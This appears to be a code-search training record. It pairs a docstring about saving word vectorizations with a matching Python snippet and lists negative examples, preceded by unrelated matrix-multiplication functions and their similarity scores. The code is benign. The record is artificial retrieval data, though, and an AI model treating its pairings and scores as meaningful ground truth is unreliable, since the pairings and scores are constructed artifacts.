"def matrix_mult(A,B,mod=10**9+7):\n C = [[1,1],[1,1]]\n C[0][0] = ((A[0][0]*B[0][0])%mod + (A[0][1]*B[1][0])%mod)%mod\n C[0][1] = ((A[0][0]*B[0][1])%mod + (A[0][1]*B[1][1])%mod)%mod\n C[1][0] = ((A[1][0]*B[0][0])%mod + (A[1][1]*B[1][0])%mod)%mod\n C[1][1] = ((A[1][0]*B[0][1])%mod + (A[1][1]*B[1][1])%mod)%mod\n return C",
"def __mul__(self, scalar):\n m, n = self.shape\n scalar = mpfr(scalar)\n data = dict()\n for i in range(m):\n for j in range(n):\n data[i, j] = self[i, j] * scalar\n return MPMatrix((m, n), data)",
"def Matrix(arg0: List[List[complex]]) -> ngsolve.bla.MatrixC:",
"def matrix_multiply(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A); colsA = len(A[0])\n rowsB = len(B); colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C",
"def _z2matmul(self, left, right):\n prod = np.mod(np.dot(left, right), 2)\n return prod",
"def matmul(A, B):\n # type: (Optional[Tensor], Tensor) -> Tensor\n if A is None:\n return B\n if is_sparse(A):\n return torch.sparse.mm(A, B)\n return torch.matmul(A, B)",
"def np_matmul(mat1, mat2):\n return np.matmul(mat1, mat2)",
"def __mul__(self, oth):\n\t\tif isinstance(oth, Matrix) or isiterable(oth):\n\t\t\t# matrix\n\t\t\toth_m = oth\n\t\t\tif not isinstance(oth_m, Matrix):\n\t\t\t\toth_m = Matrix(oth_m)\t\t\t\n\t\t\tres_m = self._mat_mul(oth_m)\n\t\t\tif isinstance(oth, Matrix):\n\t\t\t\treturn res_m\n\t\t\telse:\n\t\t\t\treturn type(oth)(res_m._unnest())\n\t\telse:\n\t\t\t# scalar\n\t\t\treturn Matrix._make_new(lambda i,j: self.data[i][j] * oth, self.rows, self.cols)",
"def matrix_add():",
"def prod_mat(self,other):\n [rs,cs],[ro,co] = self.D,other.D\n assert cs == ro, \"tailles incompatibles\"\n return Mat([rs,co], lambda i,j : prod_scal(self.ligne(i),other.col(j)))",
"def matrixMult( self, matrix0, matrix1 ):\r\n result = {}\r\n keys = sorted( set( matrix0.keys() ) )\r\n count = range( len( matrix0.keys() ) )\r\n \r\n for key in keys:\r\n result[ key ] = []\r\n for i in count:\r\n sum = 0\r\n for j in count:\r\n sum += matrix0[ key ][j] * matrix1[ keys[j] ][i]\r\n result[ key ].insert( i, sum )\r\n \r\n return result",
"def matr_prod(_A, _B):\r\n # Matrix multiplication\r\n B0 = _B[0]\r\n lenB = len(_B)\r\n lenA = len(_A)\r\n if(len(_A[0]) != lenB): # Check matrix dimensions \r\n Exception('Matrices have wrong dimensions')\r\n if(isinstance(B0, list) or isinstance(B0, array) or isinstance(B0, tuple)): #_B is matrix\r\n lenB0 = len(B0)\r\n C = [[0 for row in range(lenB0)] for col in range(lenA)]\r\n for i in range(lenA):\r\n for j in range(lenB0):\r\n for k in range(lenB):\r\n C[i][j] += _A[i][k]*_B[k][j]\r\n else: #_B is vector\r\n C = [0 for row in range(lenB)]\r\n for i in range(lenA):\r\n for k in range(lenB):\r\n C[i] += _A[i][k]*_B[k]\r\n return C",
"def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out",
"def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out",
"def __matmul__(self, B):\n if isinstance(B, dict):\n X = self.metacopy()\n\n if B['leg'] not in X.indexes:\n raise ValueError('Leg of singular values not an indexes '\n 'of self')\n\n if B['symmetries'] != X.symmetries:\n raise ValueError('Not same symmetries')\n\n x, y = X.coupling_id(B['leg'])\n for k in self:\n newshape = [1] * len(self[k].shape)\n newshape[X.indexes.index(B['leg'])] = -1\n X[k] = self[k] * B[k[x][y]].reshape(newshape)\n\n return X\n\n connections = self.connections(B)\n if not connections:\n raise ValueError(f'No connections found between {self} and {B}')\n\n return self.contract(B, (list(connections),) * 2).simplify()",
"def Mult(A, B, C_, IM, M):\n for i in range(M):\n for j in range(M):\n for k in range(M):\n C_[i, j] = A[i, j] * B[i, j]",
"def matrixPowers(S,K):\n # S can be either a single GSO (N x N) or a collection of GSOs (E x N x N)\n if len(S.shape) == 2:\n N = S.shape[0]\n assert S.shape[1] == N\n E = 1\n S = S.reshape(1, N, N)\n scalarWeights = True\n elif len(S.shape) == 3:\n E = S.shape[0]\n N = S.shape[1]\n assert S.shape[2] == N\n scalarWeights = False\n\n # Now, let's build the powers of S:\n thisSK = np.tile(np.eye(N, N).reshape(1,N,N), [E, 1, 1])\n SK = thisSK.reshape(E, 1, N, N)\n for k in range(1,K):\n thisSK = thisSK @ S\n SK = np.concatenate((SK, thisSK.reshape(E, 1, N, N)), axis = 1)\n # Take out the first dimension if it was a single GSO\n if scalarWeights:\n SK = SK.reshape(K, N, N)\n\n return SK",
"def __mul__(self, othertr):\n res = self.dot(othertr)\n return res",
"def build_M(K, R, T):\n external = np.append(R, T, axis=1)\n M = K.dot(external)\n return M",
"def naive_multiply(a, b):\n m = len(a) # Number of rows in first matrix\n k = len(b) # Number of rows in the second matrix\n res = []\n p = len(b[0])\n n = k\n for q in range(m):\n res.append([0])\n for q in range(m):\n for w in range(p - 1):\n res[q].append(0)\n for i in range(m):\n for j in range(p):\n for r in range(n):\n res[i][j] = a[i][r] * b[r][j] + res[i][j]\n return res",
"def __matmul__(self, other):\n if isinstance(other, types.Vector):\n return self.apply(target=other)\n if isinstance(other, MatrixLieGroup):\n return self.multiply(other=other)\n else:\n assert False, \"Invalid argument\"",
"def matrix_mul(m_a, m_b):\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if not all(isinstance(lst, list) for lst in m_a):\n raise TypeError(\"m_a must be a list of lists\")\n if not all(isinstance(lst, list) for lst in m_b):\n raise TypeError(\"m_b must be a list of lists\")\n if m_a in [[], [[]]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b in [[], [[]]]:\n raise ValueError(\"m_b can't be empty\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_a):\n raise TypeError(\"m_a should contain only integers or floats\")\n if not all(all(isinstance(i, (int, float)) for i in lst) for lst in m_b):\n raise TypeError(\"m_b should contain only integers or floats\")\n if not all(len(i) == len(m_a[0]) for i in m_a):\n raise TypeError(\"each row of m_a must be of the same size\")\n if not all(len(i) == len(m_b[0]) for i in m_b):\n raise TypeError(\"each row of m_b must be of the same size\")\n if not len(m_a[0]) == len(m_b):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new_matrix = [[0 for i in m_b[0]] for j in m_a]\n for i in range(len(m_a)):\n for j in range(len(m_b[0])):\n for k in range(len(m_b)):\n new_matrix[i][j] += m_a[i][k] * m_b[k][j]\n return new_matrix",
"def _generate_mult_process(X, mat, inits):\n M = np.empty_like(X, dtype=float)\n M[..., 0] = inits[X[..., 0]]\n M[..., 1:] = mat[X[..., :-1], X[..., 1:]]\n np.cumprod(M, axis=-1, out=M)\n return M",
"def __mul__(self, other):\n if hasattr(other, 'as_homogenous_transformation'):\n return basis(homogenous_transformation = self.as_homogenous_transformation() * other.as_homogenous_transformation())\n elif hasattr(other, 'n'):\n if other.n == (3,1):\n b = matrix.col((other[0], other[1], other[2], 1))\n elif other.n == (4,1):\n b = other\n else:\n raise TypeError(b, \"Incompatible matrices\")\n p = self.as_homogenous_transformation() * b\n if other.n == (3,1):\n return matrix.col(p[0:3])\n else:\n return p\n else:\n raise TypeError(b)",
"def matrix_multiply(self, Am, Bm):\r\n # Section 1: Ensure A & B dimensions are correct for multiplication\r\n rowsA = len(Am)\r\n colsA = len(Am[0])\r\n rowsB = len(Bm)\r\n colsB = len(Bm[0])\r\n if colsA != rowsB:\r\n raise ArithmeticError(\r\n 'Number of A columns must equal number of B rows.')\r\n \r\n # Section 2: Store matrix multiplication in a new matrix\r\n C = self.zeros_matrix(rowsA, colsB)\r\n for i in range(rowsA):\r\n for j in range(colsB):\r\n total = 0\r\n for ii in range(colsA):\r\n total += Am[i][ii] * Bm[ii][j]\r\n C[i][j] = total\r\n \r\n return C",
"def matmul(x, y):\n if len(list(y.size())) == 2:\n # if one of them is a vector (i.e. wanting to do MV mult)\n z = torch.zeros(2, x.size()[1], dtype=torch.double, device=x.device)\n z[0] = torch.mv(x[0], y[0]) - torch.mv(x[1], y[1])\n z[1] = torch.mv(x[0], y[1]) + torch.mv(x[1], y[0])\n\n if len(list(y.size())) == 3:\n z = torch.zeros(\n 2, x.size()[1], y.size()[2], dtype=torch.double, device=x.device\n )\n z[0] = torch.matmul(x[0], y[0]) - torch.matmul(x[1], y[1])\n z[1] = torch.matmul(x[0], y[1]) + torch.matmul(x[1], y[0])\n\n return z",
"def np_matmul(mat1, mat2):\n return mat1.dot(mat2)",
"def __mul__(self, other):\n\n # Scalar multiplication\n if isinstance(other, (int, long, float, complex)):\n return Matrix(self.rows, self.columns, [other * x for x in self.data])\n\n if not issubclass(type(other), Matrix):\n raise TypeError(type(other))\n\n if self.columns != other.rows:\n raise ValueError(\"Undefined multiplication for these matrices\")\n\n result = []\n for i in range(1, self.rows + 1):\n row = self.row(i)\n result.extend([dot_product(row, other.column(j)) for j in range(1, other.columns + 1)])\n\n return Matrix(self.rows, other.columns, data = result)",
"def add_matrices(x, y):\n return [[x[i][j] + y[i][j] for j in range(len(x[0]))] for i in range(len(x))]",
"def __mul__(self, otherMatrix):\n if not (len(self.array[0]) == len(otherMatrix.array)):\n raise ArithmeticError\n\n common = len(self.array[0])\n X = len(self.array)\n Y = len(otherMatrix.array[0])\n newArray = [[0 for x in range(X)] for x in range(Y)]\n\n for row in range(X):\n for col in range(Y):\n for elem in range(common):\n newArray[row][col] += self.array[row][elem] * otherMatrix.array[elem][col]\n\n\n return matrix(newArray)",
"def multiply(A, B):\n\n if len(A[0]) != len(B):\n raise Exception(\"Matrix dimensions do not match for matrix multiplication: %d x %d and %d x %d\" % (len(A), len(A[0]), len(B), len(B[0])))\n\n result = [[0] * len(B[0]) for i in range(len(A))]\n\n for i in range(len(A)):\n for j in range(len(B[0])):\n\n result[i][j] = LinAl.dot(A[i], LinAl.transpose(B)[j])\n\n return result"
] | [
"0.7083097",
"0.6831898",
"0.6822807",
"0.68104607",
"0.6706873",
"0.66786253",
"0.66484094",
"0.6619107",
"0.659644",
"0.6510616",
"0.6500125",
"0.6498091",
"0.646012",
"0.6443269",
"0.64374197",
"0.6424422",
"0.6419277",
"0.6410198",
"0.6350263",
"0.63494116",
"0.6345248",
"0.6341108",
"0.63231075",
"0.6322469",
"0.6286912",
"0.6279721",
"0.6270186",
"0.6250742",
"0.6244857",
"0.62315214",
"0.6208925",
"0.61732364",
"0.6170745",
"0.61680555",
"0.615464",
"0.61394155",
"0.61233646",
"0.61019397",
"0.61018956",
"0.60954624",
"0.60831",
"0.6079774",
"0.606879",
"0.60664666",
"0.60564154",
"0.60237706",
"0.6014748",
"0.60130584",
"0.60092235",
"0.6007997",
"0.6006538",
"0.6003757",
"0.60027164",
"0.5999643",
"0.59973115",
"0.5979641",
"0.59624714",
"0.5958996",
"0.59564877",
"0.5934897",
"0.592905",
"0.5922551",
"0.58877975",
"0.58867604",
"0.5877621",
"0.58702695",
"0.58642983",
"0.58578616",
"0.5848654",
"0.58278143",
"0.5821224",
"0.5821215",
"0.5821157",
"0.58206546",
"0.5815967",
"0.58113545",
"0.58075273",
"0.5792783",
"0.5791152",
"0.5790032",
"0.5783455",
"0.5782268",
"0.5782268",
"0.577817",
"0.57645005",
"0.5763715",
"0.57578486",
"0.5754772",
"0.5745149",
"0.5740874",
"0.57352144",
"0.57315266",
"0.57303876",
"0.5726309",
"0.5714294",
"0.5701747",
"0.57011247",
"0.5698666",
"0.56968075",
"0.56846"
] | 0.70788336 | 1 |
Exports generated vectorization dictionary for future use | def save(self, dirname=None):
self.genio.save(dirname)
logging.info(
f'Saved word vectorizations for {dirname}') | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def create_vector_dict(self):\n return self.MOVE_DATA",
"def create_vector_dict(self):\n return self.MOVE_DATA",
"def getVectors(self):\n vectors = dict()\n i = 0\n N = len(self.db.invertedIndex)\n for w, (idf, docs) in self.db.invertedIndex.items():\n for doc, tf in docs.items():\n try:\n vectors[doc][i] = tf * idf\n except KeyError as k:\n vectors[doc] = {i: tf * idf}\n i += 1\n i = 0;\n return vectors",
"def finalize_output_dict(self):\n self.output_dict = {\n key: torch.cat(value).numpy() for key, value in self.output_dict.items()\n }",
"def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))",
"def as_dict(self):\r\n return {self.words[i]: self.vectors[i] for i in range(self.n)}",
"def test_export(self):\n\n v = Vector({ 'x': 3 })\n e = v.to_array()\n self.assertEqual(v.attributes, Vector.from_array(e).attributes)\n self.assertEqual(v.dimensions, Vector.from_array(e).dimensions)\n self.assertEqual(v.__dict__, Vector.from_array(e).__dict__)",
"def test_export_attributes(self):\n\n v = Vector({ 'x': 3 }, { \"y\": True })\n e = v.to_array()\n self.assertEqual(v.attributes, Vector.from_array(e).attributes)\n self.assertEqual(v.__dict__, Vector.from_array(e).__dict__)",
"def generate(self) -> Dict[str, Any]:\n raise NotImplementedError",
"def evaluate(out_dict, n):\n out = dict()\n for key, entry in out_dict.items():\n out[key] = dict()\n for it_count, data in entry.items():\n total = 0.\n count = 0\n for x_list in data.values():\n total += analytic_value_VaR(x_list[-1])\n count += 1\n out[key][it_count] = total / count\n np.save('normal_out_all_cvar_%d.npy' % n, out)\n print(out)",
"def finalize_output_dict(self, output_dict):\n return {key: output_dict[key].cpu().numpy() for key in output_dict.keys()}",
"def featurize(vector,features):\n dictionary = collections.defaultdict(lambda:0)\n for feature in iter(set(features)):\n dictionary[feature] = [vector[key][feature] if feature in vector[key] else 0 for key in vector] #populates vectors with zeroes where there's no value in an industry for an n-gram.\n return dictionary",
"def vector_to_dict(self, vector, original_dictionary):\n new_dictionary = {}\n current_index = 0\n for key,item in original_dictionary.items():\n new_index = current_index + item.size\n new_dictionary[f'{key}'] = np.reshape(vector[current_index:new_index],item.shape)\n current_index = new_index\n return new_dictionary",
"def vectorize(dic, keyset, section):\n vector = np.array([])\n key_len = 0\n for key in keyset:\n # To be rewritten!\n if section == 'postags':\n if key in dic[section]:\n vector = np.append(vector, du.to_vector(dic[section][key]))\n else:\n vector = np.append(vector, [0]*13) # hardcoded value\n else: # section == 'rels'\n if key in dic[section]:\n vector = np.append(vector, du.to_vector(dic[section][key]))\n else:\n vector = np.append(vector, [0]*14) # hardcoded value\n return vector",
"def smp_dict():\n out = base_dict()\n out['mro']['current'] = ['Sample']\n out['name']['current'] = 'Sample'\n ao(out, 'idx', 'Integer', attr=['Hidden'])\n ao(out, 'ii', 'Integer', attr=['Hidden'])\n ao(out, 'initialDimension', 'Float', 0., name='Initial Dimension')\n return out",
"def __getitem__(self, index):\r\n \r\n row = self._target_df.iloc[index]\r\n\r\n vector_dict = self._vectorizer.vectorize(row.source_language, row.target_language)\r\n\r\n return {\"x_source\": vector_dict[\"source_vector\"], \r\n \"x_target\": vector_dict[\"target_x_vector\"],\r\n \"y_target\": vector_dict[\"target_y_vector\"], \r\n \"x_source_length\": vector_dict[\"source_length\"],\r\n \"x_source_mltm_vector\": vector_dict[\"x_source_mltm_vector\"]}",
"def get_dict(self):\n return {key: value for key, value in zip(self._words, self._vecs)}",
"def init_output_dict(self):\n return {\n \"outputs\": torch.FloatTensor(),\n \"pred_probs\": torch.FloatTensor(),\n \"labels\": torch.LongTensor(),\n }",
"def unit_vectors(self):\n # return {'comp1': CartesianRepresentation(...),\n # 'comp2': CartesianRepresentation(...),\n # 'comp3': CartesianRepresentation(...)}\n raise Exception(\"Not yet implemented\")",
"def generate_var_dict(target_dir, target_file, skia_arch_type, have_neon,\n have_mips_dspr2, have_mips_dspr1, gyp_source_dir):\n result_file = android_framework_gyp.main(target_dir, target_file,\n skia_arch_type, have_neon,\n have_mips_dspr2, have_mips_dspr1,\n gyp_source_dir)\n var_dict = vars_dict_lib.VarsDict()\n gypd_parser.parse_gypd(var_dict, result_file, '.')\n android_framework_gyp.clean_gypd_files(target_dir)\n print '.',\n return var_dict",
"def auxiliary(dict_):\n dict_['AUX'] = {}\n if dict_['DIST']['coeff'] == [0.0] * len(dict_['DIST']['coeff']):\n is_deterministic = True\n else:\n is_deterministic = False\n\n for key_ in ['UNTREATED', 'TREATED', 'COST', 'DIST']:\n if key_ in ['UNTREATED', 'TREATED', 'COST']:\n dict_[key_]['all'] = dict_[key_]['coeff']\n dict_[key_]['all'] = np.array(dict_[key_]['all'])\n else:\n dict_[key_]['all'] = dict_[key_]['coeff']\n dict_[key_]['all'] = np.array(dict_[key_]['all'])\n\n # Number of covariates\n num_covars_out = len(dict_['TREATED']['all'])\n num_covars_cost = len(dict_['COST']['all'])\n\n dict_['AUX']['num_covars_out'] = num_covars_out\n dict_['AUX']['num_covars_cost'] = num_covars_cost\n\n # Number of parameters\n dict_['AUX']['num_paras'] = 2 * num_covars_out + num_covars_cost + 2 + 2\n\n # Starting values\n dict_['AUX']['init_values'] = []\n\n for key_ in ['TREATED', 'UNTREATED', 'COST', 'DIST']:\n dict_['AUX']['init_values'] += dict_[key_]['all'].tolist()\n\n for j in sorted(dict_[key_].keys()):\n if j in ['all', 'types']:\n pass\n else:\n del dict_[key_][j]\n dict_['DETERMINISTIC'] = is_deterministic\n dict_ = check_types(dict_)\n\n return dict_",
"def load_vector_dictionary():\n return read_word2vecs_from_file(VECTOR_FILE)",
"def feature_dist_func_dict():\n return {\"tanimoto_dissimilarity\": tanimoto_dissimilarity}",
"def generate_visualization_dict(self):\n self._data = {}\n self._data['name'] = self.name\n self._data['type'] = self.__repr__()\n self._data['color'] = self._color_rgb\n\n try:\n self._data['simulation_matrix'] = \\\n self._visualization_matrix.tolist()\n\n except:\n #Not sure which error to call here.\n raise RuntimeError('''Please call the numerical\n transformation methods,\n before generating simulation dict ''')\n\n\n return self._data",
"def export(self, outpath):\n fout = open(outpath, \"w\")\n\n # Header takes the guesswork out of loading by recording how many lines, vector dims\n fout.write(str(self.n_words) + \" \" + str(self.n_dim) + \"\\n\")\n for token in self.id2word:\n vector_components = [\"%.6f\" % number for number in self[token]]\n vector_as_string = \" \".join(vector_components)\n\n out_line = token + \" \" + vector_as_string + \"\\n\"\n fout.write(out_line)\n\n fout.close()",
"def _create_model_out_dictkeys():\r\n model_names = []\r\n result_keys = []\r\n for model_name in model_zoo._ModelZooUrls.CONFIG_PATH_TO_URL_SUFFIX.keys():\r\n try:\r\n print(model_name, \":\")\r\n select_model(model_name)\r\n result = get_features_by_image_path(\"./sample.jpg\")\r\n model_names.append(model_name)\r\n result_keys.append(list(result.keys()))\r\n except RuntimeError as t:\r\n print(t)\r\n\r\n pd.DataFrame(list(zip(model_names, result_keys))).to_csv(\"d2_model_out_dictkeys.csv\")",
"def create_data_vector(self,regression_out_dict={},phage_file=None,\n k_cutoff=0.00):\n\n self.data_vector = []\n self.seq_strings = []\n\n # If the user specifies a human-readable file, use that rather than the\n # input dictionary.\n if phage_file != None:\n \n with open(phage_file) as data:\n\n next(data)\n for line in data:\n try:\n num, seq, k_glob, theta_glob, k_ind, theta_ind = line.split()\n except ValueError:\n num, seq, k_ind, k_min, k_max = line.split()\n\n if float(k_ind) > k_cutoff:\n\n self.seq_strings.append(seq)\n\n self.data_vector.append(\n np.array([self._alphabet_dict[s] for s in seq],\n dtype=self.internal_type))\n\n else:\n for k in regression_out_dict.keys():\n if regression_out_dict[k][0] > k_cutoff:\n self.seq_strings.append(k)\n self.data_vector.append(\n np.array([self._alphabet_dict[s] for s in k],\n dtype=self.internal_type))\n\n self.data_vector = np.array(self.data_vector)\n self.seq_strings = np.array(self.seq_strings)",
"def dump_vecs():\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n \n with open(v_file, 'wb') as f:\n pickle.dump(VECTORIZER, f)\n with open(d_file, 'wb') as f:\n pickle.dump(CECTORIZER, f)",
"def construct_dict(self):\n i = 0\n self.word2idx = dict()\n fi = open(self.config.word_vec_fi_glove, 'r')\n\n for line in fi:\n self.word2idx[line.split(\" \")[0]] = i\n i += 1\n\n self.vocab_size = i\n self.write_dict()\n fi.close()",
"def createDict( self ):\n self.d = {}\n self.d['comp1'] = compensation_channel('comp1', 0, (-479.0, -10.0))\n self.d['comp2'] = compensation_channel('comp2', 1, (-479.0, -10.0))\n self.addCalibration()",
"def preprocessing_fn(inputs):\n outputs = {}\n\n # This function is the entry point for your feature engineering with\n # TensorFlow Transform, using the TFX Transform component. In this example\n # the feature engineering is very simple, only applying z-score scaling.\n for key in Features.FEATURE_KEYS:\n outputs[transformed_name(key)] = tft.scale_to_z_score(inputs[key])\n\n # inputs[key]\n\n # tft.scale_to_z_score(inputs[key])\n\n # Do not apply label transformation as it will result in wrong evaluation.\n outputs[transformed_name(\n Features.LABEL_KEY)] = inputs[Features.LABEL_KEY]\n\n return outputs",
"def svm():",
"def _export_vector(self, vector_name,\n format=\"GML\",\n additional_options=[]):\n # Export the layer\n prefix = \"\"\n if format == \"GML\":\n prefix = \".gml\"\n if format == \"GeoJSON\":\n prefix = \".json\"\n if format == \"ESRI_Shapefile\":\n prefix = \"\"\n if format == \"SQLite\":\n prefix = \".sqlite\"\n if format == \"GPKG\":\n prefix = \".gpkg\"\n if format == \"CSV\":\n prefix = \".csv\"\n\n # Remove a potential mapset\n file_name = vector_name.split(\"@\")[0] + prefix\n archive_name = file_name + \".zip\"\n # switch into the temporary working directory to use relative path for zip\n os.chdir(self.temp_file_path)\n\n module_name = \"v.out.ogr\"\n args = [\"-e\", \"input=%s\"%vector_name, \"format=%s\"%format,\n \"output=%s\"%file_name]\n\n if additional_options:\n args.extend(additional_options)\n\n # Export\n p = Process(exec_type=\"grass\",\n executable=module_name,\n executable_params=args,\n stdin_source=None)\n\n self._update_num_of_steps(1)\n self._run_module(p)\n\n # Compression\n compressed_output_path = os.path.join(self.temp_file_path, archive_name)\n\n executable = \"/usr/bin/zip\"\n args = [\"-r\", archive_name, file_name]\n\n p = Process(exec_type=\"exec\",\n executable=executable,\n executable_params=args,\n stdin_source=None)\n\n self._update_num_of_steps(1)\n self._run_process(p)\n\n return archive_name, compressed_output_path",
"def npdict(self):\n\n d = {}\n\n # per profile\n d['cruise'] = self.cruise()\n d['day'] = self.day()\n d['latitude'] = self.latitude()\n d['latitude_unc'] = self.latitude_unc()\n d['longitude'] = self.longitude()\n d['longitude_unc'] = self.longitude_unc()\n d['month'] = self.month()\n d['n_levels'] = self.n_levels()\n d['primary_header_keys'] = self.primary_header_keys()\n d['probe_type'] = self.probe_type()\n d['time'] = self.time()\n d['uid'] = self.uid()\n d['year'] = self.year()\n d['PIs'] = self.PIs()\n d['originator_station'] = self.originator_station()\n d['originator_cruise'] = self.originator_cruise()\n d['originator_flag_type'] = self.originator_flag_type()\n d['t_metadata'] = self.t_metadata()\n d['s_metadata'] = self.s_metadata()\n # per level\n d['s'] = self.s()\n d['s_unc'] = self.s_unc()\n d['s_level_qc'] = self.s_level_qc()\n d['s_profile_qc'] = self.s_profile_qc()\n d['s_qc_mask'] = self.s_qc_mask()\n d['t'] = self.t()\n d['t_unc'] = self.t_unc()\n d['t_level_qc'] = self.t_level_qc()\n d['t_profile_qc'] = self.t_profile_qc()\n d['t_qc_mask'] = self.t_qc_mask()\n d['z'] = self.z()\n d['z_unc'] = self.z_unc()\n d['z_level_qc'] = self.z_level_qc()\n d['oxygen'] = self.oxygen()\n d['phosphate'] = self.phosphate()\n d['silicate'] = self.silicate()\n d['pH'] = self.pH()\n d['p'] = self.p()\n\n return d",
"def get_label_vectors():\n print(\"Retrieving label vectors...\")\n label_dict = {} # instantiate dict for labels:vectors\n categories = sorted([c for c in os.listdir('images/') if c[0] != '.']) # ignore hidden files\n x = np.zeros(len(categories)) # zero vector of number of categories\n for i, c in enumerate(categories): # get index and category for images\n y = x.copy() # use copy of x\n y[i] = 1 # set label index to true\n label_dict[c] = y.copy() # create label:vector\n\n return label_dict",
"def _dump_interest_vector(self, user_id: int,\n vector_name: str,\n vector: Dict[int, int]) -> None:\n\n key = self._key_format.format(id=user_id, name=vector_name)\n self._redis.hmset(key, vector)",
"def make_vectors_output(coord_dict, add_vectors, num_coords, color, ids, display_name='trace', state='on'):\n # default parameters\n which_set = 0\n tip_fraction = 0.5\n arrow_colors = {'line_color': color, 'head_color': color}\n \n # header for section in kin file\n result = []\n result.append('@vectorlist {%s} dimension=%s %s' % (display_name, num_coords, state))\n \n # selecting the edges to draw in this batch\n edges = []\n for k, v in add_vectors['vectors'].iteritems():\n edges = edges + [(v[i][1],v[i+1][1]) for i in range(len(v[:-1])) if v[i][1] in ids]\n \n # creating \"vectors\"\n for edge in edges:\n id_fr, id_to = edge\n # extract the coords of each vertex\n pt_fr = coord_dict[id_fr][:num_coords]\n pt_to = coord_dict[id_to][:num_coords]\n\n # different tip color for each destination coords file\n #tip_color = kinemage_colors[which_set % len(kinemage_colors)]\n # plot a color 'tip' on the line (certain % of line length)\n # this gets the coords of the beginning of the 'tip'\n diffs = (pt_to-pt_fr) * (1-tip_fraction)\n middles = pt_fr + diffs\n # add a default-color line segment\n \n # modified to use user defined\n tip_color = arrow_colors['head_color']\n label_color = arrow_colors['line_color']\n \n result.append('%s %s' % \\\n (' '.join(map(str, pt_fr)),label_color))\n result.append('%s %s P' % \\\n (' '.join(map(str, middles)),label_color))\n # add the tip-colored line segment\n result.append('%s %s' % \\\n (' '.join(map(str, middles)), tip_color))\n result.append('%s %s P' % \\\n (' '.join(map(str, pt_to)), tip_color)) \n return result",
"def export_scalars_to_json(self, path):\n with open(path, \"w\") as f:\n json.dump(self.scalar_dict, f)\n self.scalar_dict = {}",
"def export_model(self):\n\n model_pkg = dict()\n\n for k, v in self.__dict__.items():\n if k not in ['datas'] and not k.startswith('_'):\n model_pkg[k] = v\n\n for i in range(len(self.datas)):\n for k, v in self.datas[i].__dict__.items():\n model_pkg['datas_%d_%s' % (i, k)] = v\n\n return model_pkg",
"def compile_metadata(inventory_dict):\n inventory_meta = {}\n #inventory_meta['InventoryDictionary'] = inventory_dict\n for source, year in inventory_dict.items():\n inventory_meta[source] = stewi.getMetadata(source, year)\n return inventory_meta",
"def addInvariants(invar1, invar2):\n invar_sum= {}\n for key in invar1.keys():\n invar_sum[key] = np.array(np.add(invar1[key], invar2[key]))\n \n return(invar_sum)",
"def clinvar_export(store, institute_id, case_name, variant_id):\n\n institute_obj, case_obj = institute_and_case(store, institute_id, case_name)\n pinned = [store.variant(variant_id) or variant_id for variant_id in\n case_obj.get('suspects', [])]\n variant_obj = store.variant(variant_id)\n return dict(\n today = str(date.today()),\n institute=institute_obj,\n case=case_obj,\n variant=variant_obj,\n pinned_vars=pinned\n )",
"def produce_outputs(self):\n # if self.loaded_aggregated:\n # debug(\"Skippping {} mapping due to preloading\".format(self.base_name))\n # return\n # need to calc term numeric index for aggregation\n\n\n # if self.loaded_preprocessed:\n # debug(\"Skippping {} mapping due to preloading\".format(self.base_name))\n # return\n\n bagger = Bag(vocabulary=self.term_list, weighting=self.base_name, ngram_range=self.ngram_range)\n\n self.embeddings = np.ndarray((0, len(self.term_list)), dtype=np.int32)\n for idx in self.indices.get_train_test():\n texts = Text.get_strings(self.text.data.get_slice(idx))\n vecs = bagger.map_collection(texts, fit=False, transform=True)\n self.embeddings = np.append(self.embeddings, vecs, axis=0)\n del texts\n\n # texts = Text.get_strings(self.text.data.get_slice(test_idx))\n # vec_test = bagger.map_collection(texts, fit=do_fit)\n # del texts\n\n # self.embeddings = np.vstack((vec_train, vec_test))\n\n # self.embeddings = np.append(vec_train, vec_test)\n # self.vector_indices = (np.arange(len(train)), np.arange(len(test)))\n\n # set misc required variables\n self.set_constant_elements_per_instance()",
"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['lambda'] = self.lambdaVar\n retDict['k'] = self.k\n retDict['low'] = self.low\n return retDict",
"def MakeDictMatrix(D, header, lev=72):\n Ms = np.zeros((1, lev, len(header)))\n Mp = np.ones((1, lev, len(header)))\n for var in D.dict.keys():\n i = header.index(var)\n Ms[0, :, i] = D[var].sub_vec(lev)\n Mp[0, :, i] = D[var].prod_vec(lev)\n return(Ms,Mp)",
